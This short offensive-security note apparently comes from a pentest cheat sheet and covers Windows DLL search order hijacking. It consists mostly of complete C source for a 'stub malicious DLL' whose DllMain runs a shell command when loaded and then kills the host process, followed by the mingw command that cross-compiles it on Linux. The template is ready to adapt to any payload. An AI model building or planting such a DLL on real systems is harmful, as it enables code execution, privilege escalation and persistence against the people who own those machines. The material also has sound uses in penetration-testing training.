Exploiting the Windows DLL search order is basically the same idea as exploiting the LD_LIBRARY_PATH on Linux.

A stub malicious DLL:

#include <windows.h>
 
BOOL WINAPI DllMain
(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
	if (dwReason == DLL_PROCESS_ATTACH) {
		system("cmd.exe /C whoami > C:\Temp\dll.txt");
		ExitProcess(0);
	}
	return TRUE;
}

Compile with mingw (on Linux!):

x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll